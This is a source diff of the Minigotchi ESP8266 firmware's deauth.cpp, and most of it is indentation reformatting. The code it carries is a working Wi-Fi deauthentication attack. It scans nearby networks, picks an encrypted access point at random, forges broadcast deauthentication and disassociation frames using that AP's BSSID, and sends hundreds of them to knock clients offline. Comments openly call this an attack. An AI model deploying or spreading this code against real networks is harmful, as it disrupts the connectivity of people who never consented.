-        Deauth::disassociateFrame[2] = 0x00; // duration (SDK takes care of that)
-        Deauth::disassociateFrame[3] = 0x00; // duration (SDK takes care of that)
+    std::copy(Deauth::broadcastAddr,
+              Deauth::broadcastAddr + sizeof(Deauth::broadcastAddr),
+              Deauth::disassociateFrame + 4);
+    std::copy(apBssid, apBssid + 6, Deauth::disassociateFrame + 10);
+    std::copy(apBssid, apBssid + 6, Deauth::disassociateFrame + 16);
 
-        // bssid
-        uint8_t *apBssid = WiFi.BSSID(Deauth::randomIndex);
+    Serial.print("('-') Full AP SSID: ");
+    Serial.println(WiFi.SSID(Deauth::randomIndex));
+    Display::updateDisplay("('-')",
+                           "Full AP SSID: " + WiFi.SSID(Deauth::randomIndex));
 
-        /** developer note:
-         *
-         * addr1: reciever addr
-         * addr2: sender addr
-         * addr3: filtering addr
-         *
-         */
+    Serial.print("('-') AP Encryption: ");
+    Serial.println(WiFi.encryptionType(Deauth::randomIndex));
+    Display::updateDisplay(
+        "('-')",
+        "AP Encryption: " + (String)WiFi.encryptionType(Deauth::randomIndex));
 
-        // copy our mac(s) to header
-        std::copy(Deauth::broadcastAddr,
-                  Deauth::broadcastAddr + sizeof(Deauth::broadcastAddr),
-                  Deauth::deauthFrame + 4);
-        std::copy(apBssid, apBssid + 6, Deauth::deauthFrame + 10);
-        std::copy(apBssid, apBssid + 6, Deauth::deauthFrame + 16);
+    Serial.print("('-') AP RSSI: ");
+    Serial.println(WiFi.RSSI(Deauth::randomIndex));
+    Display::updateDisplay("('-')", "AP RSSI: " +
+                                        (String)WiFi.RSSI(Deauth::randomIndex));
 
-        std::copy(Deauth::broadcastAddr,
-                  Deauth::broadcastAddr + sizeof(Deauth::broadcastAddr),
-                  Deauth::disassociateFrame + 4);
-        std::copy(apBssid, apBssid + 6, Deauth::disassociateFrame + 10);
-        std::copy(apBssid, apBssid + 6, Deauth::disassociateFrame + 16);
+    Serial.print("('-') AP BSSID: ");
+    printMac(apBssid);
 
-        Serial.print("('-') Full AP SSID: ");
-        Serial.println(WiFi.SSID(Deauth::randomIndex));
-        Display::updateDisplay("('-')",
-                               "Full AP SSID: " + WiFi.SSID(Deauth::randomIndex));
+    Serial.print("('-') AP Channel: ");
+    Serial.println(WiFi.channel(Deauth::randomIndex));
+    Display::updateDisplay(
+        "('-')", "AP Channel: " + (String)WiFi.channel(Deauth::randomIndex));
 
-        Serial.print("('-') AP Encryption: ");
-        Serial.println(WiFi.encryptionType(Deauth::randomIndex));
-        Display::updateDisplay(
-            "('-')",
-            "AP Encryption: " + (String)WiFi.encryptionType(Deauth::randomIndex));
+    Serial.print("('-') AP Hidden?: ");
+    Serial.println(Deauth::printHidden(Deauth::randomIndex));
+    Display::updateDisplay(
+        "('-')", "AP Hidden?: " + Deauth::printHidden(Deauth::randomIndex));
+    Serial.println(" ");
+    delay(Config::longDelay);
 
-        Serial.print("('-') AP RSSI: ");
-        Serial.println(WiFi.RSSI(Deauth::randomIndex));
-        Display::updateDisplay("('-')", "AP RSSI: " +
-                               (String)WiFi.RSSI(Deauth::randomIndex));
+    Parasite::sendDeauthStatus(PICKED_AP, Deauth::randomAP.c_str(),
+                               WiFi.channel(Deauth::randomIndex));
 
-        Serial.print("('-') AP BSSID: ");
-        printMac(apBssid);
+    return true;
+  } else if (apCount < 0) {
+    Serial.println("(;-;) I don't know what you did, but you screwed up!");
+    Serial.println(" ");
+    Display::updateDisplay("(;-;)", "You screwed up somehow!");
 
-        Serial.print("('-') AP Channel: ");
-        Serial.println(WiFi.channel(Deauth::randomIndex));
-        Display::updateDisplay(
-            "('-')", "AP Channel: " + (String)WiFi.channel(Deauth::randomIndex));
+    Parasite::sendDeauthStatus(DEAUTH_SCAN_ERROR);
 
-        Serial.print("('-') AP Hidden?: ");
-        Serial.println(Deauth::printHidden(Deauth::randomIndex));
-        Display::updateDisplay(
-            "('-')", "AP Hidden?: " + Deauth::printHidden(Deauth::randomIndex));
-        Serial.println(" ");
-        delay(Config::longDelay);
+    delay(Config::shortDelay);
+  } else {
+    // well ur fucked.
+    Serial.println("(;-;) No access points found.");
+    Serial.println(" ");
+    Display::updateDisplay("(;-;)", "No access points found.");
 
-        Parasite::sendDeauthStatus(PICKED_AP, Deauth::randomAP.c_str(),
-                                   WiFi.channel(Deauth::randomIndex));
+    Parasite::sendDeauthStatus(NO_APS);
 
-        return true;
-    } else if (apCount < 0) {
-        Serial.println("(;-;) I don't know what you did, but you screwed up!");
-        Serial.println(" ");
-        Display::updateDisplay("(;-;)", "You screwed up somehow!");
-
-        Parasite::sendDeauthStatus(DEAUTH_SCAN_ERROR);
-
-        delay(Config::shortDelay);
-    } else {
-        // well ur fucked.
-        Serial.println("(;-;) No access points found.");
-        Serial.println(" ");
-        Display::updateDisplay("(;-;)", "No access points found.");
-
-        Parasite::sendDeauthStatus(NO_APS);
-
-        delay(Config::shortDelay);
-    }
-    return false;
+    delay(Config::shortDelay);
+  }
+  return false;
 }
 
 void Deauth::deauth() {
-    if (Config::deauth) {
-        // select AP
-        if (Deauth::select()) {
-            if (randomAP.length() > 0) {
-                Serial.println(
-                    "(>-<) Starting deauthentication attack on the selected AP...");
-                Serial.println(" ");
-                Display::updateDisplay("(>-<)", "Begin deauth-attack on AP...");
-                delay(Config::shortDelay);
-                // define the attack
-                if (!running) {
-                    start();
-                } else {
-                    Serial.println("('-') Attack is already running.");
-                    Serial.println(" ");
-                    Display::updateDisplay("('-')", "Attack is already running.");
-                    delay(Config::shortDelay);
-                }
-            } else {
-                // ok why did you modify the deauth function? i literally told you to
-                // not do that...
-                Serial.println("(X-X) No access point selected. Use select() first.");
-                Serial.println("('-') Told you so!");
-                Serial.println(" ");
-                Display::updateDisplay("(X-X)",
-                                       "No access point selected. Use select() first.");
-                delay(Config::shortDelay);
-                Display::updateDisplay("('-')", "Told you so!");
-                delay(Config::shortDelay);
-                return;
-            }
+  if (Config::deauth) {
+    // select AP
+    if (Deauth::select()) {
+      if (randomAP.length() > 0) {
+        Serial.println(
+            "(>-<) Starting deauthentication attack on the selected AP...");
+        Serial.println(" ");
+        Display::updateDisplay("(>-<)", "Begin deauth-attack on AP...");
+        delay(Config::shortDelay);
+        // define the attack
+        if (!running) {
+          start();
+        } else {
+          Serial.println("('-') Attack is already running.");
+          Serial.println(" ");
+          Display::updateDisplay("('-')", "Attack is already running.");
+          delay(Config::shortDelay);
         }
-    } else {
-        // do nothing if deauthing is disabled
+      } else {
+        // ok why did you modify the deauth function? i literally told you to
+        // not do that...
+        Serial.println("(X-X) No access point selected. Use select() first.");
+        Serial.println("('-') Told you so!");
+        Serial.println(" ");
+        Display::updateDisplay("(X-X)",
+                               "No access point selected. Use select() first.");
+        delay(Config::shortDelay);
+        Display::updateDisplay("('-')", "Told you so!");
+        delay(Config::shortDelay);
+        return;
+      }
     }
+  } else {
+    // do nothing if deauthing is disabled
+  }
 }
 
 void Deauth::start() {
-    running = true;
-    int deauthFrameSize = sizeof(deauthFrame);
-    int disassociateFrameSize = sizeof(disassociateFrame);
-    int packets = 0;
-    unsigned long startTime = millis();
+  running = true;
+  int deauthFrameSize = sizeof(deauthFrame);
+  int disassociateFrameSize = sizeof(disassociateFrame);
+  int packets = 0;
+  unsigned long startTime = millis();
 
-    // packet calculation
-    int basePacketCount = 150;
-    int rssi = WiFi.RSSI(Deauth::randomIndex);
-    int numDevices = WiFi.softAPgetStationNum();
+  // packet calculation
+  int basePacketCount = 150;
+  int rssi = WiFi.RSSI(Deauth::randomIndex);
+  int numDevices = WiFi.softAPgetStationNum();
 
-    int packetCount = basePacketCount + (numDevices * 10);
-    if (rssi > -50) {
-        packetCount /= 2; // strong signal
-    } else if (rssi < -80) {
-        packetCount *= 2; // weak signal
+  int packetCount = basePacketCount + (numDevices * 10);
+  if (rssi > -50) {
+    packetCount /= 2; // strong signal
+  } else if (rssi < -80) {
+    packetCount *= 2; // weak signal
+  }
+
+  Parasite::sendDeauthStatus(START_DEAUTH, Deauth::randomAP.c_str(),
+                             WiFi.channel(Deauth::randomIndex));
+
+  // send the deauth 150 times(ur cooked if they find out)
+  for (int i = 0; i < packetCount; ++i) {
+    if (Deauth::send(deauthFrame, deauthFrameSize, 0) &&
+        Deauth::send(disassociateFrame, disassociateFrameSize, 0)) {
+      packets++;
+      float pps = packets / (float)(millis() - startTime) * 1000;
+
+      // show pps
+      if (!isinf(pps)) {
+        Serial.print("(>-<) Packets per second: ");
+        Serial.print(pps);
+        Serial.print(" pkt/s");
+        Serial.println(" (AP:" + randomAP + ")");
+        Display::updateDisplay("(>-<)", "Packets per second: " + (String)pps +
+                                            " pkt/s" + "(AP:" + randomAP + ")");
+      }
+    } else if (!Deauth::send(deauthFrame, deauthFrameSize, 0) &&
+               !Deauth::send(disassociateFrame, disassociateFrameSize, 0)) {
+      Serial.println("(X-X) Both packets failed to send!");
+      Display::updateDisplay("(X-X)", "Both packets failed to send!");
+    } else if (!Deauth::send(deauthFrame, deauthFrameSize, 0) &&
+               Deauth::send(disassociateFrame, disassociateFrameSize, 0)) {
+      Serial.println("(X-X) Deauthentication failed to send!");
+      Display::updateDisplay("(X-X)", "Deauth failed to send!");
+    } else if (Deauth::send(deauthFrame, deauthFrameSize, 0) &&
+               !Deauth::send(disassociateFrame, disassociateFrameSize, 0)) {
+      Serial.println("(X-X) Disassociation failed to send!");
+      Display::updateDisplay("(X-X)", "Disassoc failed to send!");
+    } else {
+      Serial.println("(X-X) Unable to calculate pkt/s!");
+      Display::updateDisplay("(X-X)", "Unable to calculate pkt/s!");
     }
+  }
 
-    Parasite::sendDeauthStatus(START_DEAUTH, Deauth::randomAP.c_str(),
-                               WiFi.channel(Deauth::randomIndex));
-
-    // send the deauth 150 times(ur cooked if they find out)
-    for (int i = 0; i < packetCount; ++i) {
-        if (Deauth::send(deauthFrame, deauthFrameSize, 0) &&
-                Deauth::send(disassociateFrame, disassociateFrameSize, 0)) {
-            packets++;
-            float pps = packets / (float)(millis() - startTime) * 1000;
-
-            // show pps
-            if (!isinf(pps)) {
-                Serial.print("(>-<) Packets per second: ");
-                Serial.print(pps);
-                Serial.print(" pkt/s");
-                Serial.println(" (AP:" + randomAP + ")");
-                Display::updateDisplay("(>-<)", "Packets per second: " + (String)pps +
-                                       " pkt/s" + "(AP:" + randomAP + ")");
-            }
-        } else if (!Deauth::send(deauthFrame, deauthFrameSize, 0) &&
-                   !Deauth::send(disassociateFrame, disassociateFrameSize, 0)) {
-            Serial.println("(X-X) Both packets failed to send!");
-            Display::updateDisplay("(X-X)", "Both packets failed to send!");
-        } else if (!Deauth::send(deauthFrame, deauthFrameSize, 0) &&
-                   Deauth::send(disassociateFrame, disassociateFrameSize, 0)) {
-            Serial.println("(X-X) Deauthentication failed to send!");
-            Display::updateDisplay("(X-X)", "Deauth failed to send!");
-        } else if (Deauth::send(deauthFrame, deauthFrameSize, 0) &&
-                   !Deauth::send(disassociateFrame, disassociateFrameSize, 0)) {
-            Serial.println("(X-X) Disassociation failed to send!");
-            Display::updateDisplay("(X-X)", "Disassoc failed to send!");
-        } else {
-            Serial.println("(X-X) Unable to calculate pkt/s!");
-            Display::updateDisplay("(X-X)", "Unable to calculate pkt/s!");
-        }
-    }
-
-    Serial.println(" ");
-    Serial.println("(^-^) Attack finished!");
-    Serial.println(" ");
-    Display::updateDisplay("(^-^)", "Attack finished!");
-    running = false;
+  Serial.println(" ");
+  Serial.println("(^-^) Attack finished!");
+  Serial.println(" ");
+  Display::updateDisplay("(^-^)", "Attack finished!");
+  running = false;
 }

--- a/minigotchi/deauth.cpp
+++ b/minigotchi/deauth.cpp
@@ -59,355 +59,355 @@ uint8_t Deauth::disassociateFrame[26];
 uint8_t Deauth::broadcastAddr[6] = {0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF};
 
 void Deauth::add(const std::string &bssids) {
-  std::stringstream ss(bssids);
-  std::string token;
+    std::stringstream ss(bssids);
+    std::string token;
 
-  // seperate info and whitelist
-  while (std::getline(ss, token, ',')) {
-    // trim out whitespace
-    token.erase(0, token.find_first_not_of(" \t\r\n"));
-    token.erase(token.find_last_not_of(" \t\r\n") + 1);
+    // seperate info and whitelist
+    while (std::getline(ss, token, ',')) {
+        // trim out whitespace
+        token.erase(0, token.find_first_not_of(" \t\r\n"));
+        token.erase(token.find_last_not_of(" \t\r\n") + 1);
 
-    // add to whitelist
-    Serial.print("('-') Adding ");
-    Serial.print(token.c_str());
-    Serial.println(" to the whitelist");
-    Display::updateDisplay("('-')", "Adding " + (String) + " to the whitelist");
-    whitelist.push_back(token.c_str());
-  }
+        // add to whitelist
+        Serial.print("('-') Adding ");
+        Serial.print(token.c_str());
+        Serial.println(" to the whitelist");
+        Display::updateDisplay("('-')", "Adding " + (String) + " to the whitelist");
+        whitelist.push_back(token.c_str());
+    }
 }
 
 void Deauth::list() {
-  for (const auto &bssid : Config::whitelist) {
-    Deauth::add(bssid);
-  }
+    for (const auto &bssid : Config::whitelist) {
+        Deauth::add(bssid);
+    }
 }
 
 bool Deauth::send(uint8_t *buf, uint16_t len, bool sys_seq) {
-  // apparently will not work with 0 on regular, fixed on spacehuhn
-  bool sent = wifi_send_pkt_freedom(buf, len, sys_seq) == 0;
-  delay(102);
+    // apparently will not work with 0 on regular, fixed on spacehuhn
+    bool sent = wifi_send_pkt_freedom(buf, len, sys_seq) == 0;
+    delay(102);
 
-  return sent;
+    return sent;
 }
 
 // check if this is a broadcast
 // source:
 // https://github.com/SpacehuhnTech/esp8266_deauther/blob/v2/esp8266_deauther/functions.h#L334
 bool Deauth::broadcast(uint8_t *mac) {
-  for (uint8_t i = 0; i < 6; i++) {
-    if (mac[i] != broadcastAddr[i])
-      return false;
-  }
+    for (uint8_t i = 0; i < 6; i++) {
+        if (mac[i] != broadcastAddr[i])
+            return false;
+    }
 
-  return true;
+    return true;
 }
 
 void Deauth::printMac(uint8_t *mac) {
-  String macStr = printMacStr(mac);
-  Serial.println(macStr); 
-  Display::updateDisplay("('-')", "AP BSSID: " + macStr);
+    String macStr = printMacStr(mac);
+    Serial.println(macStr);
+    Display::updateDisplay("('-')", "AP BSSID: " + macStr);
 }
 
 String Deauth::printHidden(int network) {
-  String hidden;
-  bool check = WiFi.isHidden(network);
+    String hidden;
+    bool check = WiFi.isHidden(network);
 
-  if (check == 0) {
-    hidden = "False";
-  } else {
-    hidden = "True";
-  }
+    if (check == 0) {
+        hidden = "False";
+    } else {
+        hidden = "True";
+    }
 
-  return hidden;
+    return hidden;
 }
 
 String Deauth::printMacStr(uint8_t *mac) {
-  char buf[18]; // 17 for MAC, 1 for null terminator
-  snprintf(buf, sizeof(buf), "%02x:%02x:%02x:%02x:%02x:%02x", mac[0], mac[1],
-           mac[2], mac[3], mac[4], mac[5]);
-  return String(buf);
+    char buf[18]; // 17 for MAC, 1 for null terminator
+    snprintf(buf, sizeof(buf), "%02x:%02x:%02x:%02x:%02x:%02x", mac[0], mac[1],
+             mac[2], mac[3], mac[4], mac[5]);
+    return String(buf);
 }
 
 bool Deauth::select() {
-  // reset values
-  Deauth::randomAP = "";
-  Deauth::randomIndex = -1;
+    // reset values
+    Deauth::randomAP = "";
+    Deauth::randomIndex = -1;
 
-  Parasite::sendDeauthStatus(START_SCAN);
+    Parasite::sendDeauthStatus(START_SCAN);
 
-  // cool animation, skip if parasite mode
-  if (!Config::parasite) {
-    for (int i = 0; i < 5; ++i) {
-      Serial.println("(0-o) Scanning for APs.");
-      Display::updateDisplay("(0-o)", "Scanning  for APs.");
-      delay(Config::shortDelay);
-      Serial.println("(o-0) Scanning for APs..");
-      Display::updateDisplay("(o-0)", "Scanning  for APs..");
-      delay(Config::shortDelay);
-      Serial.println("(0-o) Scanning for APs...");
-      Display::updateDisplay("(0-o)", "Scanning  for APs...");
-      delay(Config::shortDelay);
-      Serial.println(" ");
-      delay(Config::shortDelay);
-    }
-    delay(Config::longDelay);
-  }
-
-  // stop and scan
-  Minigotchi::monStop();
-
-  int apCount = 0;
-  // If a parasite channel is set, then we want to focus on that channel
-  // Otherwise go off on our own and scan for whatever is out there
-  if (Parasite::channel > 0) {
-    apCount = WiFi.scanNetworks(false, false, Parasite::channel);
-  } else {
-    apCount = WiFi.scanNetworks();
-  }
-
-  if (apCount > 0 && Deauth::randomIndex == -1) {
-    Deauth::randomIndex = random(apCount);
-    Deauth::randomAP = WiFi.SSID(Deauth::randomIndex);
-    uint8_t encType = WiFi.encryptionType(Deauth::randomIndex);
-
-    Serial.print("('-') Selected random AP: ");
-    Serial.println(randomAP.c_str());
-    Serial.println(" ");
-    Display::updateDisplay("('-')", "Selected random AP: " + randomAP);
-    delay(Config::shortDelay);
-
-    if (encType == -1 || encType == ENC_TYPE_NONE) {
-      Serial.println(
-          "('-') Selected AP is not encrypted. Skipping deauthentication...");
-      Display::updateDisplay(
-          "('-')",
-          "Selected AP is not encrypted. Skipping deauthentication...");
-      Parasite::sendDeauthStatus(SKIPPING_UNENCRYPTED);
-      return false;
+    // cool animation, skip if parasite mode
+    if (!Config::parasite) {
+        for (int i = 0; i < 5; ++i) {
+            Serial.println("(0-o) Scanning for APs.");
+            Display::updateDisplay("(0-o)", "Scanning  for APs.");
+            delay(Config::shortDelay);
+            Serial.println("(o-0) Scanning for APs..");
+            Display::updateDisplay("(o-0)", "Scanning  for APs..");
+            delay(Config::shortDelay);
+            Serial.println("(0-o) Scanning for APs...");
+            Display::updateDisplay("(0-o)", "Scanning  for APs...");
+            delay(Config::shortDelay);
+            Serial.println(" ");
+            delay(Config::shortDelay);
+        }
+        delay(Config::longDelay);
     }
 
-    // check for ap in whitelist
-    if (std::find(whitelist.begin(), whitelist.end(), randomAP) !=
-        whitelist.end()) {
-      Serial.println("('-') Selected AP is in the whitelist. Skipping "
-                     "deauthentication...");
-      Display::updateDisplay(
-          "('-')",
-          "Selected AP is in the whitelist. Skipping deauthentication...");
-      Parasite::sendDeauthStatus(SKIPPING_WHITELIST);
-      return false;
+    // stop and scan
+    Minigotchi::monStop();
+
+    int apCount = 0;
+    // If a parasite channel is set, then we want to focus on that channel
+    // Otherwise go off on our own and scan for whatever is out there
+    if (Parasite::channel > 0) {
+        apCount = WiFi.scanNetworks(false, false, Parasite::channel);
+    } else {
+        apCount = WiFi.scanNetworks();
     }
 
-    /** developer note:
-     *
-     * here we will create the deauth frame using the header,
-     * as we find the AP in question we also generate the required information
-     * for it as well...
-     *
-     */
+    if (apCount > 0 && Deauth::randomIndex == -1) {
+        Deauth::randomIndex = random(apCount);
+        Deauth::randomAP = WiFi.SSID(Deauth::randomIndex);
+        uint8_t encType = WiFi.encryptionType(Deauth::randomIndex);
 
-    // clear out exisitng frame...
-    std::fill(std::begin(Deauth::deauthFrame), std::end(Deauth::deauthFrame),
-              0);
-    std::fill(std::begin(Deauth::disassociateFrame),
-              std::end(Deauth::disassociateFrame), 0);
+        Serial.print("('-') Selected random AP: ");
+        Serial.println(randomAP.c_str());
+        Serial.println(" ");
+        Display::updateDisplay("('-')", "Selected random AP: " + randomAP);
+        delay(Config::shortDelay);
 
-    // copy template
-    std::copy(Deauth::deauthTemp,
-              Deauth::deauthTemp + sizeof(Deauth::deauthTemp),
-              Deauth::deauthFrame);
-    std::copy(Deauth::deauthTemp,
-              Deauth::deauthTemp + sizeof(Deauth::deauthTemp),
-              Deauth::disassociateFrame);
+        if (encType == -1 || encType == ENC_TYPE_NONE) {
+            Serial.println(
+                "('-') Selected AP is not encrypted. Skipping deauthentication...");
+            Display::updateDisplay(
+                "('-')",
+                "Selected AP is not encrypted. Skipping deauthentication...");
+            Parasite::sendDeauthStatus(SKIPPING_UNENCRYPTED);
+            return false;
+        }
 
-    Deauth::deauthFrame[0] = 0xC0; // type
-    Deauth::deauthFrame[1] = 0x00; // subtype
-    Deauth::deauthFrame[2] = 0x00; // duration (SDK takes care of that)
-    Deauth::deauthFrame[3] = 0x00; // duration (SDK takes care of that)
+        // check for ap in whitelist
+        if (std::find(whitelist.begin(), whitelist.end(), randomAP) !=
+                whitelist.end()) {
+            Serial.println("('-') Selected AP is in the whitelist. Skipping "
+                           "deauthentication...");
+            Display::updateDisplay(
+                "('-')",
+                "Selected AP is in the whitelist. Skipping deauthentication...");
+            Parasite::sendDeauthStatus(SKIPPING_WHITELIST);
+            return false;
+        }
 
-    Deauth::disassociateFrame[0] = 0xA0; // type
-    Deauth::disassociateFrame[1] = 0x00; // subtype
-    Deauth::disassociateFrame[2] = 0x00; // duration (SDK takes care of that)
-    Deauth::disassociateFrame[3] = 0x00; // duration (SDK takes care of that)
+        /** developer note:
+         *
+         * here we will create the deauth frame using the header,
+         * as we find the AP in question we also generate the required information
+         * for it as well...
+         *
+         */
 
-    // bssid
-    uint8_t *apBssid = WiFi.BSSID(Deauth::randomIndex);
+        // clear out exisitng frame...
+        std::fill(std::begin(Deauth::deauthFrame), std::end(Deauth::deauthFrame),
+                  0);
+        std::fill(std::begin(Deauth::disassociateFrame),
+                  std::end(Deauth::disassociateFrame), 0);
 
-    /** developer note:
-     *
-     * addr1: reciever addr
-     * addr2: sender addr
-     * addr3: filtering addr
-     *
-     */
+        // copy template
+        std::copy(Deauth::deauthTemp,
+                  Deauth::deauthTemp + sizeof(Deauth::deauthTemp),
+                  Deauth::deauthFrame);
+        std::copy(Deauth::deauthTemp,
+                  Deauth::deauthTemp + sizeof(Deauth::deauthTemp),
+                  Deauth::disassociateFrame);
 
-    // copy our mac(s) to header
-    std::copy(Deauth::broadcastAddr,
-              Deauth::broadcastAddr + sizeof(Deauth::broadcastAddr),
-              Deauth::deauthFrame + 4);
-    std::copy(apBssid, apBssid + 6, Deauth::deauthFrame + 10);
-    std::copy(apBssid, apBssid + 6, Deauth::deauthFrame + 16);
+        Deauth::deauthFrame[0] = 0xC0; // type
+        Deauth::deauthFrame[1] = 0x00; // subtype
+        Deauth::deauthFrame[2] = 0x00; // duration (SDK takes care of that)
+        Deauth::deauthFrame[3] = 0x00; // duration (SDK takes care of that)
 
-    std::copy(Deauth::broadcastAddr,
-              Deauth::broadcastAddr + sizeof(Deauth::broadcastAddr),
-              Deauth::disassociateFrame + 4);
-    std::copy(apBssid, apBssid + 6, Deauth::disassociateFrame + 10);
-    std::copy(apBssid, apBssid + 6, Deauth::disassociateFrame + 16);
+        Deauth::disassociateFrame[0] = 0xA0; // type
+        Deauth::disassociateFrame[1] = 0x00; // subtype
+        Deauth::disassociateFrame[2] = 0x00; // duration (SDK takes care of that)
+        Deauth::disassociateFrame[3] = 0x00; // duration (SDK takes care of that)
 
-    Serial.print("('-') Full AP SSID: ");
-    Serial.println(WiFi.SSID(Deauth::randomIndex));
-    Display::updateDisplay("('-')",
-                           "Full AP SSID: " + WiFi.SSID(Deauth::randomIndex));
+        // bssid
+        uint8_t *apBssid = WiFi.BSSID(Deauth::randomIndex);
 
-    Serial.print("('-') AP Encryption: ");
-    Serial.println(WiFi.encryptionType(Deauth::randomIndex));
-    Display::updateDisplay(
-        "('-')",
-        "AP Encryption: " + (String)WiFi.encryptionType(Deauth::randomIndex));
+        /** developer note:
+         *
+         * addr1: reciever addr
+         * addr2: sender addr
+         * addr3: filtering addr
+         *
+         */
 
-    Serial.print("('-') AP RSSI: ");
-    Serial.println(WiFi.RSSI(Deauth::randomIndex));
-    Display::updateDisplay("('-')", "AP RSSI: " +
-                                        (String)WiFi.RSSI(Deauth::randomIndex));
+        // copy our mac(s) to header
+        std::copy(Deauth::broadcastAddr,
+                  Deauth::broadcastAddr + sizeof(Deauth::broadcastAddr),
+                  Deauth::deauthFrame + 4);
+        std::copy(apBssid, apBssid + 6, Deauth::deauthFrame + 10);
+        std::copy(apBssid, apBssid + 6, Deauth::deauthFrame + 16);
 
-    Serial.print("('-') AP BSSID: ");
-    printMac(apBssid);
+        std::copy(Deauth::broadcastAddr,
+                  Deauth::broadcastAddr + sizeof(Deauth::broadcastAddr),
+                  Deauth::disassociateFrame + 4);
+        std::copy(apBssid, apBssid + 6, Deauth::disassociateFrame + 10);
+        std::copy(apBssid, apBssid + 6, Deauth::disassociateFrame + 16);
 
-    Serial.print("('-') AP Channel: ");
-    Serial.println(WiFi.channel(Deauth::randomIndex));
-    Display::updateDisplay(
-        "('-')", "AP Channel: " + (String)WiFi.channel(Deauth::randomIndex));
+        Serial.print("('-') Full AP SSID: ");
+        Serial.println(WiFi.SSID(Deauth::randomIndex));
+        Display::updateDisplay("('-')",
+                               "Full AP SSID: " + WiFi.SSID(Deauth::randomIndex));
 
-    Serial.print("('-') AP Hidden?: ");
-    Serial.println(Deauth::printHidden(Deauth::randomIndex));
-    Display::updateDisplay(
-        "('-')", "AP Hidden?: " + Deauth::printHidden(Deauth::randomIndex));
-    Serial.println(" ");
-    delay(Config::longDelay);
+        Serial.print("('-') AP Encryption: ");
+        Serial.println(WiFi.encryptionType(Deauth::randomIndex));
+        Display::updateDisplay(
+            "('-')",
+            "AP Encryption: " + (String)WiFi.encryptionType(Deauth::randomIndex));
 
-    Parasite::sendDeauthStatus(PICKED_AP, Deauth::randomAP.c_str(),
-                               WiFi.channel(Deauth::randomIndex));
+        Serial.print("('-') AP RSSI: ");
+        Serial.println(WiFi.RSSI(Deauth::randomIndex));
+        Display::updateDisplay("('-')", "AP RSSI: " +
+                               (String)WiFi.RSSI(Deauth::randomIndex));
 
-    return true;
-  } else if (apCount < 0) {
-    Serial.println("(;-;) I don't know what you did, but you screwed up!");
-    Serial.println(" ");
-    Display::updateDisplay("(;-;)", "You screwed up somehow!");
+        Serial.print("('-') AP BSSID: ");
+        printMac(apBssid);
 
-    Parasite::sendDeauthStatus(DEAUTH_SCAN_ERROR);
+        Serial.print("('-') AP Channel: ");
+        Serial.println(WiFi.channel(Deauth::randomIndex));
+        Display::updateDisplay(
+            "('-')", "AP Channel: " + (String)WiFi.channel(Deauth::randomIndex));
 
-    delay(Config::shortDelay);
-  } else {
-    // well ur fucked.
-    Serial.println("(;-;) No access points found.");
-    Serial.println(" ");
-    Display::updateDisplay("(;-;)", "No access points found.");
+        Serial.print("('-') AP Hidden?: ");
+        Serial.println(Deauth::printHidden(Deauth::randomIndex));
+        Display::updateDisplay(
+            "('-')", "AP Hidden?: " + Deauth::printHidden(Deauth::randomIndex));
+        Serial.println(" ");
+        delay(Config::longDelay);
 
-    Parasite::sendDeauthStatus(NO_APS);
+        Parasite::sendDeauthStatus(PICKED_AP, Deauth::randomAP.c_str(),
+                                   WiFi.channel(Deauth::randomIndex));
 
-    delay(Config::shortDelay);
-  }
-  return false;
+        return true;
+    } else if (apCount < 0) {
+        Serial.println("(;-;) I don't know what you did, but you screwed up!");
+        Serial.println(" ");
+        Display::updateDisplay("(;-;)", "You screwed up somehow!");
+
+        Parasite::sendDeauthStatus(DEAUTH_SCAN_ERROR);
+
+        delay(Config::shortDelay);
+    } else {
+        // well ur fucked.
+        Serial.println("(;-;) No access points found.");
+        Serial.println(" ");
+        Display::updateDisplay("(;-;)", "No access points found.");
+
+        Parasite::sendDeauthStatus(NO_APS);
+
+        delay(Config::shortDelay);
+    }
+    return false;
 }
 
 void Deauth::deauth() {
-  if (Config::deauth) {
-    // select AP
-    if (Deauth::select()) {
-      if (randomAP.length() > 0) {
-        Serial.println(
-            "(>-<) Starting deauthentication attack on the selected AP...");
-        Serial.println(" ");
-        Display::updateDisplay("(>-<)", "Begin deauth-attack on AP...");
-        delay(Config::shortDelay);
-        // define the attack
-        if (!running) {
-          start();
-        } else {
-          Serial.println("('-') Attack is already running.");
-          Serial.println(" ");
-          Display::updateDisplay("('-')", "Attack is already running.");
-          delay(Config::shortDelay);
+    if (Config::deauth) {
+        // select AP
+        if (Deauth::select()) {
+            if (randomAP.length() > 0) {
+                Serial.println(
+                    "(>-<) Starting deauthentication attack on the selected AP...");
+                Serial.println(" ");
+                Display::updateDisplay("(>-<)", "Begin deauth-attack on AP...");
+                delay(Config::shortDelay);
+                // define the attack
+                if (!running) {
+                    start();
+                } else {
+                    Serial.println("('-') Attack is already running.");
+                    Serial.println(" ");
+                    Display::updateDisplay("('-')", "Attack is already running.");
+                    delay(Config::shortDelay);
+                }
+            } else {
+                // ok why did you modify the deauth function? i literally told you to
+                // not do that...
+                Serial.println("(X-X) No access point selected. Use select() first.");
+                Serial.println("('-') Told you so!");
+                Serial.println(" ");
+                Display::updateDisplay("(X-X)",
+                                       "No access point selected. Use select() first.");
+                delay(Config::shortDelay);
+                Display::updateDisplay("('-')", "Told you so!");
+                delay(Config::shortDelay);
+                return;
+            }
         }
-      } else {
-        // ok why did you modify the deauth function? i literally told you to
-        // not do that...
-        Serial.println("(X-X) No access point selected. Use select() first.");
-        Serial.println("('-') Told you so!");
-        Serial.println(" ");
-        Display::updateDisplay("(X-X)",
-                               "No access point selected. Use select() first.");
-        delay(Config::shortDelay);
-        Display::updateDisplay("('-')", "Told you so!");
-        delay(Config::shortDelay);
-        return;
-      }
+    } else {
+        // do nothing if deauthing is disabled
     }
-  } else {
-    // do nothing if deauthing is disabled
-  }
 }
 
 void Deauth::start() {
-  running = true;
-  int deauthFrameSize = sizeof(deauthFrame);
-  int disassociateFrameSize = sizeof(disassociateFrame);
-  int packets = 0;
-  unsigned long startTime = millis();
+    running = true;
+    int deauthFrameSize = sizeof(deauthFrame);
+    int disassociateFrameSize = sizeof(disassociateFrame);
+    int packets = 0;
+    unsigned long startTime = millis();
 
-  // packet calculation
-  int basePacketCount = 150;
-  int rssi = WiFi.RSSI(Deauth::randomIndex);
-  int numDevices = WiFi.softAPgetStationNum();
+    // packet calculation
+    int basePacketCount = 150;
+    int rssi = WiFi.RSSI(Deauth::randomIndex);
+    int numDevices = WiFi.softAPgetStationNum();
 
-  int packetCount = basePacketCount + (numDevices * 10);
-  if (rssi > -50) {
-    packetCount /= 2; // strong signal
